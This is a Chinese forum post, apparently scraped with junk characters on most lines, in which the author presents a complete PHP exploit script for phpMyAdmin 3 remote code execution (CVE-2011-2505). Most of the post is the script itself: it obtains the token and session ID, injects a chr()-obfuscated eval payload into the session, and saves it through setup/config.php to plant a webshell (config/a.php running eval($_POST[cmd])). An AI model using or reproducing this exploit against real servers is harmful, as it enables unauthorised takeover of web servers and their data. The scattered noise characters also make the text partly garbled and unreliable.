最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。+ y9 o3 `: A/ `/ S5 V! q# |* G
( ~+ c' _( _: s3 ~昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。7 B. d0 ^! J2 x, \/ m) [: }) I- h
% a+ Q6 P* m5 c* O7 }
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
" ?6 _! N" k, k7 K: h( b3 i, S一是session.auto_start = 1;+ w, W7 S2 h/ w
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
5 C3 ]4 E6 P N3 M% v5 C6 p9 `当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。5 ?8 a- N+ G; _9 e! s# M. k! t
0 P: P4 m/ |) ~. v+ R
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。 e$ j/ o0 k% V& O7 d4 |
K" N, r: A' e/ j于是写了这个php版本的exp,代码如下: \3 p1 R% X8 i1 X8 Q0 C- D1 E9 i
- A* _+ ^# ~* O#!/usr/bin/php
* _% U% ?- G; j9 U9 ^ W<?php! e/ T# V/ ?. p, l" p8 W
print_r('
* x! l3 }3 S$ X% b2 w+ T5 q- ^: S+---------------------------------------------------------------------------+
* c1 P, X. \/ [$ M2 c% npma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
' v- O% O( A ^- P' e# zby oldjun(www.oldjun.com)
0 s, @+ N9 k6 }6 i3 ~1 b( jwelcome to www.t00ls.net
6 ~7 p" _1 M* |( e) Gmail: oldjun@gmail.com' n" l' i, N. q6 X6 D
Assigned CVE id: CVE-2011-2505
& ]7 M, A$ g9 [8 U9 [0 n+ P2 G+---------------------------------------------------------------------------+$ c% G. V/ g9 V
');1 y+ m" b" z( @
9 P; d6 T) O! a" r5 m. t/**
: j0 h' ]4 K4 Y, A+ a j6 G1 K, v * working when the directory:"config" exists and is writeable.
6 @) o, d6 j7 l! c0 {. C**/
: L6 T6 S/ z/ ^- P- S / [2 T) X/ u1 v) l' _8 `* L+ l; ]
if ($argc < 3) {
/ s2 M3 M4 j& _9 X4 r print_r('6 `( j. g% {0 o- U( o
+---------------------------------------------------------------------------+
( f, g7 H* M! j1 t' Z0 [5 }3 EUsage: php '.$argv[0].' host path1 ^2 D* F. b: ~, R+ r8 Q
host: target server (ip/hostname)
6 r: ]0 o+ H; R0 dpath: path to pma3
/ T2 m* Z. Q, f2 ^ FExample:3 }$ K! x4 c% r+ K+ |, [, `
php '.$argv[0].' localhost /pma/' c0 `, `& h, G b U& |. N
+---------------------------------------------------------------------------+2 e; O' Z: B2 w& m4 e& @& t% J/ i
');
, O* T6 \9 `% b+ |- Q exit;" Q J: _( O! a( Q
}
) m, U0 U6 O1 `* R3 i
& P* ]- y/ i: r0 o% d/ S$ E. Y$host = $argv[1];* R1 J$ \: W1 Z7 R
$path = $argv[2];
. O- G4 {. R. C3 V9 P" m9 h; K R, q: w7 o# q
/**
+ l, ]# K$ Z6 k! {! d* l6 E& x) O * Try to determine if the directory:"config" exists
/ n; B; \' ?, n$ [ E8 x. s6 [**/9 C3 w; t" U, [8 m, r( l8 n
echo "[+] Try to determine if the directory:config exists....\n";
( _1 P8 l" M9 n; {% m1 ]8 z$returnstr=php_request('config/');
# p' I! B" o K# B" ^9 mif(strpos($returnstr,'404')){
1 Z+ @% h% ^, d exit("[-] Exploit Failed! The directory:config do not exists!\n");5 a- r( B1 p( Y- S v: o$ j& b
}" a7 {' C: U; h% ^' ^/ T
+ j' X) f6 S! n6 Y
/**
/ L# b+ @3 G5 f6 J8 | * Try to get token and sessionid, r, l7 S6 P* {
**/
- `5 t* P2 d1 i3 }echo "[+] Try to get token and sessionid....\n";# z& `# Y, i" h# O8 _
$result=php_request('index.php');. n. q, X5 E' W. e+ t( `$ p
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);6 _5 v9 Z. I3 b+ c
$token=$resp[3];
+ F) }1 y# L( I9 ~$sessionid=$resp[1];
6 D/ o6 s; v3 E/ dif($token && $sessionid){( r( ?: S1 `+ v4 K. y0 }
echo "[+] token token\n";4 c+ x4 h; q h3 M% b. V8 c( ~1 M
echo "[+] Session IDsessionid\n";# J( L% ]& [0 R9 D1 P/ T- Y
}else{0 X3 x/ ?1 S3 `
exit("[-] Can't get token and Session ID,Exploit Failed!\n");) Z5 e' r8 I5 m( s/ B* B
}
' M$ Y' ?! u+ L2 @+ ~. x
- ]8 p1 }& L) b. W; K/**
$ B0 `# ^! G, w# p- V4 j* b9 O * Try to insert shell into session8 V$ F! P* {: R
**/; G1 s9 u! T3 p" B, t
echo "[+] Try to insert shell into session....\n";
! @4 p& G$ v; r# gphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
1 T2 B- o; h+ J
8 o3 k& [9 m& Q- D) D/**& S( Z/ i* r+ [& t/ P
* Try to create webshell
# t3 B8 O+ a Y**/# i- n% @! h6 ]
echo "[+] Try to create webshell....\n";
% s+ B. j, V7 {/ mphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
4 R; q3 W6 o; `" [6 {: C: i/**
- K- B, R0 |, E( M * Try to check if the webshell was created successfully2 k( ~" l# N3 |3 w$ \% g
**/! C8 T; ?* s" L8 e0 `
echo "[+] Try to check if the webshell was created successfully....\n";
6 e1 I4 k7 A0 S; N" Z$content=php_request('config/config.inc.php');
5 ~6 [5 P- Q3 ~! \% sif(strpos($content,'t00ls')){
5 [" p+ I, w) j) t, u echo "[+] Congratulations! Expoilt successfully....\n";$ @1 f2 h$ X5 A0 w. i* ]& Z
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";# j# Q8 g- `. v5 V
}else{
7 K% I( W) W3 t+ V, ]. a exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");4 ], Y: O% Z! q( l! S4 [- j; @
}
6 W: X# n/ i# L: x9 ~* [: o8 i
+ ~6 M1 M5 o' z( _. n$ m {function php_request($url,$data='',$cookie=''){5 m% G5 ?. a3 L- k! [
global $host, $path;
( l" ]7 M) m% t: U7 `! \# S9 I1 o
( l* c o* C2 N0 x $method=$data?'POST':'GET';/ P1 i/ s# l7 J5 V# b1 s, G
3 ^& g. j& L2 {. K) s7 g4 i $packet = $method." ".$path.$url." HTTP/1.1\r\n";1 V! _+ q. _9 E' ?
$packet .= "Accept: */*\r\n";
1 |1 z @# x7 @8 C* z. g $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
) J4 X; Z' }2 c. U& p $packet .= "Host: $host\r\n"; _( k* b" B4 }' a' G
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";: B" A+ S' p7 _ V8 }% N2 L; o% k
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
9 e* s3 Y R' B6 h( G, m $packet .= $cookie?"Cookie: $cookie\r\n":"";. x+ A& _4 o$ h8 U( U5 c
$packet .= "Connection: Close\r\n\r\n";- x2 Z+ S" j, k% N; K' [( U
$packet .= $data?$data:"";" n- ?4 J; _' F# M& K! x- f& Z" Q
0 R$ P; [' n3 ^0 e$ c' [2 Y
$fp = fsockopen(gethostbyname($host), 80);8 x: K9 E+ J! ]) }. X" S# D
if (!$fp) {! l" z$ r* h9 m3 Y
echo 'No response from '.$host; die;
8 _( V6 f; @' {0 z5 S }
$ s: K$ l# R8 c2 q fputs($fp, $packet);
- S8 L8 J, C; \% m; r3 S: G/ }
' X/ {" N7 w; t" ]5 ?1 ^ $resp = '';
6 W0 c4 T) [( Y% ^1 C9 N- a, f$ E' S. {# ~( a: K' I* z
while ($fp && !feof($fp))9 ?0 |) ~& [# Q1 ]6 v
$resp .= fread($fp, 1024);
6 T' [3 l) L+ F& ? N1 o% [. C# O" z* L- \1 v/ Q
return $resp;: t: `7 e/ h) \8 `( f# G/ r- B/ \
}
7 N; t+ D2 q: [8 { / r, b' c3 N9 s9 O, c, [( z
?>
( P* G3 N! S# g5 I1 J. |
发表于 2013-2-21 09:13:03
收藏
支持
反对